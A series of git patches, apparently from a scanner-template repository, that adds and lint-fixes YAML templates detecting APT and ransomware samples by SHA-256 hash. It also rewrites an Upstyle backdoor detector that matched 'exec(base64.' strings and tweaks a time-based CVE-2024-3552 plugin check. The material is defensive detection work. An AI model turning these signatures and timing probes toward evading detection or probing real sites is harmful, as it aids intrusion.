https://github.com/Yara-Rules/rules/blob/master/malware/APT_Sauron_extras.yar + tags: malware,apt,sauron + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9'" + - "sha256(raw) == '30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8'" + - "sha256(raw) == 'a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec'" + - "sha256(raw) == 'e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57'" + - "sha256(raw) == '3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8'" + - "sha256(raw) == '7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca'" + - "sha256(raw) == '6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd'" + condition: or diff --git a/file/malware/hash/seaduke-malware-hash.yaml b/file/malware/hash/seaduke-malware-hash.yaml new file mode 100644 index 0000000000..183975b755 --- /dev/null +++ b/file/malware/hash/seaduke-malware-hash.yaml @@ -0,0 +1,19 @@ +id: seaduke-malware-hash +info: + name: SeaDuke Malware Hash - Detect + author: pussycat0x + severity: info + reference: | + http://goo.gl/MJ0c2M + https://github.com/Yara-Rules/rules/blob/master/malware/APT_Seaduke.yar + tags: malware,seaduke + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'd2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e'" + diff --git a/file/malware/hash/sfx1-malware-hash.yaml b/file/malware/hash/sfx1-malware-hash.yaml new file mode 100644 index 0000000000..7158918abc --- /dev/null +++ b/file/malware/hash/sfx1-malware-hash.yaml @@ -0,0 +1,21 @@ +id: sfx1-malware-hash +info: + name: Malicious SFX1 Hash - Detect + author: pussycat0x + severity: info + description: SFX with voicemail content + reference: + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950 + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Minidionis.yar + tags: malware,sfx1 + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f'" + - "sha256(raw) == '502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d'" + condition: or diff --git a/file/malware/hash/sfxrar-acrotray-malware-hash.yaml b/file/malware/hash/sfxrar-acrotray-malware-hash.yaml new file mode 100644 index 0000000000..ea95e45d7a --- /dev/null +++ b/file/malware/hash/sfxrar-acrotray-malware-hash.yaml @@ -0,0 +1,21 @@ +id: sfxrar-acrotray-malware-hash +info: + name: SFXRAR Acrotray Malware Hash - Detect + author: pussycat0x + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Cloudduke.yar + - https://www.f-secure.com/weblog/archives/00002822.html + tags: malware,apt,sfx + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57'" + - "sha256(raw) == '5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48'" + - "sha256(raw) == '56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/sharpext-malware.yaml b/file/malware/hash/sharpext-malware-hash.yaml similarity index 89% rename from file/malware/hash/sharpext-malware.yaml rename to file/malware/hash/sharpext-malware-hash.yaml index c87c46c689..858ece9035 100644 --- a/file/malware/hash/sharpext-malware.yaml +++ b/file/malware/hash/sharpext-malware-hash.yaml @@ -1,6 +1,6 @@ -id: sharpext-malware +id: sharpext-malware-hash info: - name: Sharpext Malware - Detect + name: Sharpext Malware Hash - Detect author: pussycat0x severity: info description: A malicious Chrome browser extension used by the SharpTongue threat actor to steal mail data from a victim. diff --git a/file/malware/hash/sofacy-Winexe-malware-hash.yaml b/file/malware/hash/sofacy-Winexe-malware-hash.yaml new file mode 100644 index 0000000000..d11191b9e4 --- /dev/null +++ b/file/malware/hash/sofacy-Winexe-malware-hash.yaml @@ -0,0 +1,20 @@ +id: sofacy-Winexe-malware-hash +info: + name: Sofacy Group Winexe Tool Hash - Detect + author: pussycat0x + severity: info + description: | + Winexe tool used by Sofacy group in Bundestag APT. + reference: | + - http://dokumente.linksfraktion.de/inhalt/report-orig.pdf + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Sofacy_Bundestag.yar + tags: malware,sofacy + +file: + extensions: + - exe + + matchers: + type: dsl + dsl: + - "sha256(raw) == '5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d'" diff --git a/file/malware/hash/sofacy-bundestag-malware-hash.yaml b/file/malware/hash/sofacy-bundestag-malware-hash.yaml new file mode 100644 index 0000000000..3b424a0a15 --- /dev/null +++ b/file/malware/hash/sofacy-bundestag-malware-hash.yaml @@ -0,0 +1,22 @@ +id: sofacy-bundestag-malware-hash +info: + name: Sofacy Group Malware - Detect + author: pussycat0x + severity: info + description: | + Sofacy Malware - German Bundestag + reference: | + - http://dokumente.linksfraktion.de/inhalt/report-orig.pdf + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Sofacy_Bundestag.yar + tags: malware,sofacy + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092'" + - "sha256(raw) == '5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1'" + condition: or diff --git a/file/malware/hash/sofacy-fybis-malware-hash.yaml b/file/malware/hash/sofacy-fybis-malware-hash.yaml new file mode 100644 index 0000000000..a285d60b0c --- /dev/null +++ b/file/malware/hash/sofacy-fybis-malware-hash.yaml @@ -0,0 +1,21 @@ +id: sofacy-fybis-malware-hash +info: + name: Sofacy Fybis Linux Backdoor Hash - Detect + author: pussycat0x + severity: info + reference: | + - http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/ + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Sofacy_Fysbis.yar + tags: malware,sofacy + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592'" + - "sha256(raw) == '8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb'" + - "sha256(raw) == 'fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61'" + condition: or diff --git a/file/malware/hash/tidepool-malware-hash.yaml b/file/malware/hash/tidepool-malware-hash.yaml new file mode 100644 index 0000000000..7346f6a7a4 --- /dev/null +++ b/file/malware/hash/tidepool-malware-hash.yaml @@ -0,0 +1,24 @@ +id: tidepool-malware-hash +info: + name: TidePool Malware Hash - Detect + author: pussycat0x + severity: info + description: | + Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks + reference: + - http://goo.gl/m2CXWR + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Ke3Chang_TidePool.yar + tags: malware,tidepool + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba'" + - "sha256(raw) == '67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed'" + - "sha256(raw) == '2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18'" + - "sha256(raw) == '38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f'" + condition: or diff --git a/file/malware/hash/turla-malware-hash.yaml b/file/malware/hash/turla-malware-hash.yaml new file mode 100644 index 0000000000..29a0af280a --- /dev/null +++ b/file/malware/hash/turla-malware-hash.yaml @@ -0,0 +1,29 @@ +id: turla-malware-hash +info: + name: Turla APT Malware - Detect + author: pussycat0x + severity: info + description: Detects Turla malware based on sample used in the RUAG APT case + reference: | + https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case + https://github.com/Yara-Rules/rules/blob/master/malware/APT_Turla_RUAG.yar + tags: malware,turla,apt,ruag + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4'" + - "sha256(raw) == '7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9'" + - "sha256(raw) == 'fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd'" + - "sha256(raw) == 'c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4'" + - "sha256(raw) == 'b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4'" + - "sha256(raw) == 'edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348'" + - "sha256(raw) == '8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a'" + - "sha256(raw) == '8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98'" + - "sha256(raw) == '0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f'" + - "sha256(raw) == '2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2'" + condition: or diff --git a/file/malware/hash/unit78020-malware-hash.yaml b/file/malware/hash/unit78020-malware-hash.yaml new file mode 100644 index 0000000000..3f1812b208 --- /dev/null +++ b/file/malware/hash/unit78020-malware-hash.yaml @@ -0,0 +1,26 @@ +id: unit78020-malware-hash +info: + name: Unit 78020 Malware Hash - Detect + author: pussycat0x + severity: info + description: | + Detects malware by Chinese APT PLA Unit 78020 - Generic Rule + reference: | + http://threatconnect.com/camerashy/?utm_campaign=CameraShy + https://github.com/Yara-Rules/rules/blob/master/malware/APT_Unit78020.yar + tags: malware,unit78020 + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72'" + - "sha256(raw) == '76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd'" + - "sha256(raw) == '2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac'" + - "sha256(raw) == '5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2'" + - "sha256(raw) == '7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af'" + - "sha256(raw) == '88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790'" + condition: or diff --git a/file/malware/hash/wildneutron-malware-hash.yaml b/file/malware/hash/wildneutron-malware-hash.yaml new file mode 100644 index 0000000000..b3c9b242b0 --- /dev/null +++ b/file/malware/hash/wildneutron-malware-hash.yaml @@ -0,0 +1,31 @@ +id: wildneutron-malware-hash +info: + name: WildNeutron APT Sample Hash - Detect + author: pussycat0x + severity: info + description: | + Wild Neutron APT Sample Rule based on file hash + reference: | + - https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/ + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_WildNeutron.yar + tags: malware,wildneutron,apt + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94'" + - "sha256(raw) == 'c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0'" + - "sha256(raw) == 'b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45'" + - "sha256(raw) == '1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206'" + - "sha256(raw) == '4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865'" + - "sha256(raw) == 'a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c'" + - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" + - "sha256(raw) == '781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e'" + - "sha256(raw) == '683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9'" + - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" + - "sha256(raw) == '8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a'" + condition: or \ No newline at end of file From 0c5631b963ca27b85943eab7a3b70bf040f743fa Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 20 Jun 2024 15:29:08 +0530 Subject: [PATCH 0449/1841] lint -fix --- file/malware/hash/blackenergy-driver-amdide-hash.yaml | 2 +- file/malware/hash/blackenergy-killdisk-malware-hash.yaml | 2 +- file/malware/hash/codoso-gh0st-malware.yaml | 2 +- file/malware/hash/codoso-pgv-malware-hash.yaml | 3 ++- file/malware/hash/codoso-plugx-malware-hash.yaml | 2 +- file/malware/hash/ironPanda-htran-malware-hash.yaml | 5 ++--- file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml | 3 +-- file/malware/hash/locky-ransomware-hash.yaml | 3 +-- file/malware/hash/passcv-signingcert-malware-hash.yaml | 3 +-- file/malware/hash/red-leaves-malware-hash.yaml | 3 +-- file/malware/hash/revil-ransomware-hash.yaml | 2 +- file/malware/hash/rokrat-malware-hash.yaml | 2 +- file/malware/hash/seaduke-malware-hash.yaml | 3 +-- file/malware/hash/sofacy-Winexe-malware-hash.yaml | 2 +- file/malware/hash/sofacy-bundestag-malware-hash.yaml | 2 +- file/malware/hash/turla-malware-hash.yaml | 4 ++-- file/malware/hash/wildneutron-malware-hash.yaml | 2 +- 17 files changed, 20 insertions(+), 25 deletions(-) diff --git a/file/malware/hash/blackenergy-driver-amdide-hash.yaml b/file/malware/hash/blackenergy-driver-amdide-hash.yaml index 80eea4d57a..1416dfb755 100644 --- a/file/malware/hash/blackenergy-driver-amdide-hash.yaml +++ b/file/malware/hash/blackenergy-driver-amdide-hash.yaml @@ -3,7 +3,7 @@ info: name: Blackenergy-Driver Amdide Hash - Detect description: | Detects the AMDIDE driver from BlackEnergy malware - reference: + reference: - http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/ tag: malware,blackenergy diff --git a/file/malware/hash/blackenergy-killdisk-malware-hash.yaml b/file/malware/hash/blackenergy-killdisk-malware-hash.yaml index 4896d043f0..65d90a1035 100644 --- a/file/malware/hash/blackenergy-killdisk-malware-hash.yaml +++ b/file/malware/hash/blackenergy-killdisk-malware-hash.yaml @@ -19,4 +19,4 @@ file: - "sha256(raw) == '5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6'" - "sha256(raw) == 'c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d'" - "sha256(raw) == 'f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95'" - condition: or \ No newline at end of file + condition: or \ No newline at end of file diff --git a/file/malware/hash/codoso-gh0st-malware.yaml b/file/malware/hash/codoso-gh0st-malware.yaml index 976e2255a8..51dbbc7495 100644 --- a/file/malware/hash/codoso-gh0st-malware.yaml +++ b/file/malware/hash/codoso-gh0st-malware.yaml @@ -3,7 +3,7 @@ info: name: Codoso APT Gh0st Malware Hash - Detect author: pussycat0x severity: info - reference: + reference: - https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Codoso.yar tags: malware,apt,codoso diff --git a/file/malware/hash/codoso-pgv-malware-hash.yaml b/file/malware/hash/codoso-pgv-malware-hash.yaml index 4927e17366..dad250bf30 100644 --- a/file/malware/hash/codoso-pgv-malware-hash.yaml +++ b/file/malware/hash/codoso-pgv-malware-hash.yaml @@ -20,4 +20,5 @@ file: - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" - "sha256(raw) == '13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75'" - "sha256(raw) == 'bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe'" - - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" \ No newline at end of file + - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/codoso-plugx-malware-hash.yaml b/file/malware/hash/codoso-plugx-malware-hash.yaml index 6f28c6c836..f0884b566b 100644 --- a/file/malware/hash/codoso-plugx-malware-hash.yaml +++ b/file/malware/hash/codoso-plugx-malware-hash.yaml @@ -5,7 +5,7 @@ info: severity: info description: | Detects Codoso APT PlugX Malware. - reference: + reference: - https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Codoso.yar tags: malware,apt,codoso diff --git a/file/malware/hash/ironPanda-htran-malware-hash.yaml b/file/malware/hash/ironPanda-htran-malware-hash.yaml index 9044c3a27e..3a237e8ca3 100644 --- a/file/malware/hash/ironPanda-htran-malware-hash.yaml +++ b/file/malware/hash/ironPanda-htran-malware-hash.yaml @@ -1,4 +1,4 @@ -id: ironPanda-htran-malware-hash +id: ironpanda-htran-malware-hash info: name: Iron Panda Malware Htran Hash - Detect author: pussycat0x @@ -17,5 +17,4 @@ file: matchers: type: dsl dsl: - - "sha256(raw) == '7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7'" - + - "sha256(raw) == '7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7'" \ No newline at end of file diff --git a/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml b/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml index 78ce70e8ad..696a548481 100644 --- a/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml +++ b/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml @@ -17,5 +17,4 @@ file: matchers: type: dsl dsl: - - "sha256(raw) == 'a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431'" - + - "sha256(raw) == 'a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431'" \ No newline at end of file diff --git a/file/malware/hash/locky-ransomware-hash.yaml b/file/malware/hash/locky-ransomware-hash.yaml index 05dca81de7..0e90f1e79e 100644 --- a/file/malware/hash/locky-ransomware-hash.yaml +++ b/file/malware/hash/locky-ransomware-hash.yaml @@ -17,5 +17,4 @@ file: matchers: type: dsl dsl: - - "sha256(raw) == '5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8'" - + - "sha256(raw) == '5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8'" \ No newline at end of file diff --git a/file/malware/hash/passcv-signingcert-malware-hash.yaml b/file/malware/hash/passcv-signingcert-malware-hash.yaml index 665d68140e..d2f38966aa 100644 --- a/file/malware/hash/passcv-signingcert-malware-hash.yaml +++ b/file/malware/hash/passcv-signingcert-malware-hash.yaml @@ -17,5 +17,4 @@ file: matchers: type: dsl dsl: - - "sha256(raw) == '7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e'" - + - "sha256(raw) == '7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e'" \ No newline at end of file diff --git a/file/malware/hash/red-leaves-malware-hash.yaml b/file/malware/hash/red-leaves-malware-hash.yaml index b131749599..06a4716156 100644 --- a/file/malware/hash/red-leaves-malware-hash.yaml +++ b/file/malware/hash/red-leaves-malware-hash.yaml @@ -17,5 +17,4 @@ file: matchers: type: dsl dsl: - - "sha256(raw) == '2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c'" - + - "sha256(raw) == '2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c'" \ No newline at end of file diff --git a/file/malware/hash/revil-ransomware-hash.yaml b/file/malware/hash/revil-ransomware-hash.yaml index 9d6c61a8fa..61adf28cd9 100644 --- a/file/malware/hash/revil-ransomware-hash.yaml +++ b/file/malware/hash/revil-ransomware-hash.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: info description: - Detect Revil Ransomware. + Detect Revil Ransomware. reference: - https://angle.ankura.com/post/102hcny/revix-linux-ransomware - https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Revix.yar diff --git a/file/malware/hash/rokrat-malware-hash.yaml b/file/malware/hash/rokrat-malware-hash.yaml index a531c05afa..e87b5e645e 100644 --- a/file/malware/hash/rokrat-malware-hash.yaml +++ b/file/malware/hash/rokrat-malware-hash.yaml @@ -2,7 +2,7 @@ id: rokrat-malware-hash info: name: ROKRAT Loader Malware Hash- Detect author: pussycat0x - severity: info + severity: info description: | Designed to catch loader observed used with ROKRAT malware reference: diff --git a/file/malware/hash/seaduke-malware-hash.yaml b/file/malware/hash/seaduke-malware-hash.yaml index 183975b755..42ed6c7871 100644 --- a/file/malware/hash/seaduke-malware-hash.yaml +++ b/file/malware/hash/seaduke-malware-hash.yaml @@ -15,5 +15,4 @@ file: matchers: type: dsl dsl: - - "sha256(raw) == 'd2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e'" - + - "sha256(raw) == 'd2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e'" \ No newline at end of file diff --git a/file/malware/hash/sofacy-Winexe-malware-hash.yaml b/file/malware/hash/sofacy-Winexe-malware-hash.yaml index d11191b9e4..90dd6d8329 100644 --- a/file/malware/hash/sofacy-Winexe-malware-hash.yaml +++ b/file/malware/hash/sofacy-Winexe-malware-hash.yaml @@ -1,4 +1,4 @@ -id: sofacy-Winexe-malware-hash +id: sofacy-winexe-malware-hash info: name: Sofacy Group Winexe Tool Hash - Detect author: pussycat0x diff --git a/file/malware/hash/sofacy-bundestag-malware-hash.yaml b/file/malware/hash/sofacy-bundestag-malware-hash.yaml index 3b424a0a15..7d27e960c4 100644 --- a/file/malware/hash/sofacy-bundestag-malware-hash.yaml +++ b/file/malware/hash/sofacy-bundestag-malware-hash.yaml @@ -19,4 +19,4 @@ file: dsl: - "sha256(raw) == '566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092'" - "sha256(raw) == '5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1'" - condition: or + condition: or diff --git a/file/malware/hash/turla-malware-hash.yaml b/file/malware/hash/turla-malware-hash.yaml index 29a0af280a..de64dd35bc 100644 --- a/file/malware/hash/turla-malware-hash.yaml +++ b/file/malware/hash/turla-malware-hash.yaml @@ -2,7 +2,7 @@ id: turla-malware-hash info: name: Turla APT Malware - Detect author: pussycat0x - severity: info + severity: info description: Detects Turla malware based on sample used in the RUAG APT case reference: | https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case @@ -26,4 +26,4 @@ file: - "sha256(raw) == '8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98'" - "sha256(raw) == '0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f'" - "sha256(raw) == '2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2'" - condition: or + condition: or \ No newline at end of file diff --git a/file/malware/hash/wildneutron-malware-hash.yaml b/file/malware/hash/wildneutron-malware-hash.yaml index b3c9b242b0..1c1a5cfd67 100644 --- a/file/malware/hash/wildneutron-malware-hash.yaml +++ b/file/malware/hash/wildneutron-malware-hash.yaml @@ -2,7 +2,7 @@ id: wildneutron-malware-hash info: name: WildNeutron APT Sample Hash - Detect author: pussycat0x - severity: info + severity: info description: | Wild Neutron APT Sample Rule based on file hash reference: | From a16560e1bf4452991a12eb50cec30f4e845476c9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 20 Jun 2024 15:31:03 +0530 Subject: [PATCH 0450/1841] Update and rename upstyle-malware.yaml to upstyle-malware-hash.yaml --- file/malware/upstyle-malware-hash.yaml | 21 +++++++++++++++++ file/malware/upstyle-malware.yaml | 31 -------------------------- 2 files changed, 21 insertions(+), 31 deletions(-) create mode 100644 file/malware/upstyle-malware-hash.yaml delete mode 100644 file/malware/upstyle-malware.yaml diff --git a/file/malware/upstyle-malware-hash.yaml b/file/malware/upstyle-malware-hash.yaml new file mode 100644 index 0000000000..dddcd0706d --- /dev/null +++ b/file/malware/upstyle-malware-hash.yaml @@ -0,0 +1,21 @@ +id: upstyle-malware-hash +info: + name: Upstyle Malware Hash - Detect + author: Kazgangap + severity: info + reference: + - https://unit42.paloaltonetworks.com/cve-2024-3400/ + - https://github.com/volexity/threat-intel/blob/main/2024/2024-04-12%20Palo%20Alto%20Networks%20GlobalProtect/indicators/rules.yar + tags: malware,cve2024 + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac'" + - "sha256(raw) == '0d59d7bddac6c22230187ef6cf7fa22bca93759edc6f9127c41dc28a2cea19d8'" + - "sha256(raw) == '4dd4bd027f060f325bf6a90d01bfcf4e7751a3775ad0246beacc6eb2bad5ec6f'" + condition: or diff --git a/file/malware/upstyle-malware.yaml b/file/malware/upstyle-malware.yaml deleted file mode 100644 index fab6017d8d..0000000000 --- a/file/malware/upstyle-malware.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: upstyle-py-malware -info: - name: Upstyle Malware - Detect - author: Kazgangap - severity: info - reference: - - https://unit42.paloaltonetworks.com/cve-2024-3400/ - - https://github.com/volexity/threat-intel/blob/main/2024/2024-04-12%20Palo%20Alto%20Networks%20GlobalProtect/indicators/rules.yar - tags: malware,cve-2024-3400 -file: - - extensions: - - "py" - - matchers: - - type: word - part: raw - words: - - "/opt/pancfg/mgmt/licenses/PA_VM" - - "exec(base64." - condition: or - - - type: word - part: raw - words: - - "signal.signal(signal.SIGTERM,stop)" - - "exec(base64." - condition: or - - - type: regex - regex: - - "write(\"/*\"+output+\"*/\")" \ No newline at end of file From 687b9c6e63b39e715ed31005f70c97b54fd44c8e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 20 Jun 2024 15:33:32 +0530 Subject: [PATCH 0451/1841] Update codoso-pgv-malware-hash.yaml --- file/malware/hash/codoso-pgv-malware-hash.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/file/malware/hash/codoso-pgv-malware-hash.yaml b/file/malware/hash/codoso-pgv-malware-hash.yaml index dad250bf30..bb8b669e28 100644 --- a/file/malware/hash/codoso-pgv-malware-hash.yaml +++ b/file/malware/hash/codoso-pgv-malware-hash.yaml @@ -4,8 +4,8 @@ info: author: pussycat0x severity: info description: | - Detects Codoso APT PGV_PVID Malware - reference: + Detects Codoso APT PGV_PVID Malware. + reference: - https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Codoso.yar tags: malware,apt,codoso @@ -21,4 +21,4 @@ file: - "sha256(raw) == '13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75'" - "sha256(raw) == 'bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe'" - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" - condition: or \ No newline at end of file + condition: or From 3f1515350ed4555cf979ee806ea753a9d216d143 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 20 Jun 2024 15:38:26 +0530 Subject: [PATCH 0452/1841] fix FN for 1st req --- http/cves/2024/CVE-2024-3552.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml index 81f373d274..e53ba3744d 100644 --- a/http/cves/2024/CVE-2024-3552.yaml +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -22,14 +22,15 @@ http: - raw: - | - GET /wp-content/plugins/web-directory-free/readme.txt HTTP/1.1 + GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: word - internal: true + part: body words: - - 'Web Directory Free' + - '/wp-content/plugins/web-directory-free' + internal: true - raw: - | @@ -43,6 +44,6 @@ http: - type: dsl dsl: - 'duration>=6' - - 'contains(body, "[]")' - 'status_code == 200' + - regex('^\[\]$', body) condition: and From b8837046d09cb50f1d005bfcf6a804f1a7fbe613 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 20 Jun 2024 10:14:00 +0000 Subject: [PATCH 0453/1841] Auto Generated New Template Addition List [Thu Jun 20 10:14:00 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7f27694f04..b7e773e68e 100644 --- a/.new-additions +++ b/.new-additions @@ -29,6 +29,7 @@ http/cves/2024/CVE-2024-31982.yaml 